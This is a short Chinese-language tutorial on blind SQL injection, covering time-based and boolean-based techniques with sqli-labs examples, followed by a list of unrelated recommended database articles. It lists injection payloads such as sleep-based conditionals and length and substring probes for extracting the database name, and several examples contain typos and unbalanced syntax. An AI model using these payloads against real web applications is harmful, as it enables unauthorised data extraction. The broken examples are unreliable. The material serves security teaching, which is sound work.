SQL注入实战:盲注

盲注:

1、当攻击者利用SQL注入漏洞进行攻击时,有时候web应用程序会显示,后端数据库执行SQL查询返回的错误信息,这些信息能帮助进行SQL注入,但更多时候,数据库没有输出数据web页面,这是攻击者会查询一系列的true或false问题,或者基于时间判断的问题,强制从数据库获取数据。

2、Blind SQL(盲注)是注入攻击的其中一种,向数据库发送true或false这样的问题,并根据应用程序返回的信息判断结果,这种攻击的出现是因为应用程序配置为只显示常规错误,并不显示sql语句的错误,这种情况并没有解决SQL注入存在的代码问题。

3、盲注可以分为基于不二的盲注和基于事件的盲注

一:基于时间的盲注

1、延时注入,用的最多的注入

2、常用的判断语句:

' and if(1=0,1,sleep(10)) --+

" and if(1=0,1,sleep(10)) --+

) and if(1=0,1,sleep(10)) --+

') and if(1=0,1,sleep(10)) --+

") and if(1=0,1,sleep(10)) --+

利用if(条件,0,1)函数,当条件为真返回0,假则返回1

sqli-lab 9-10实验就是基于时间的盲注

?id=1' and if(ascli(substr(database(),1.1))=115,sleep(5),1)--+

二:基于布尔的盲注

基于布尔型的盲注,我们通常采用下面的方法猜解字符串,

select length(database());

select substr(database(),1,1);

select length ascii(substr(database(),1,1);

select length ascii(substr(database(),1,1)>N;

select length ascii(substr(database(),1,1)=N;

select length ascii(substr(databa

se(),1,1)<N;

输入:?id=1

输入:?id=1'

输入:?id=1' and length(database())=8 --+ (查看数据库的长度)

把=8改成=9,会发现没有了 (说明数据库长度为8)

相关推荐
断春风6 分钟前
如何避免 MySQL 死锁?——从原理到实战的系统性解决方案
数据库·mysql
闲人编程7 分钟前
基础设施即代码(IaC)工具比较:Pulumi vs Terraform
java·数据库·terraform·iac·codecapsule·pulumi
QQ_216962909614 分钟前
Spring Boot大学生社团管理平台 【部署教程+可完整运行源码+数据库】
java·数据库·spring boot·微信小程序
玉成22619 分钟前
MySQL两表之间数据迁移由于字段排序规则设置的不一样导致失败
数据库·mysql
dblens 数据库管理和开发工具28 分钟前
DBLens:让 SQL 查询更智能、更高效的数据库利器
服务器·数据库·sql·数据库连接工具·dblens
TDengine (老段)39 分钟前
TDengine 在新能源领域的最佳实践
大数据·数据库·物联网·时序数据库·tdengine·涛思数据
Alluxio39 分钟前
Alluxio正式登陆Oracle云市场,为AI工作负载提供TB级吞吐量与亚毫秒级延迟
人工智能·分布式·机器学习·缓存·ai·oracle
是席木木啊42 分钟前
Spring Boot 中 @Async 与 @Transactional 结合使用全解析:避坑指南
数据库·spring boot·oracle
__风__42 分钟前
PostgreSQL 创建扩展后台流程
数据库·postgresql
StarRocks_labs42 分钟前
Fresha 的实时分析进化:从 Postgres 和 Snowflake 走向 StarRocks
数据库·starrocks·postgres·snowflake·fresha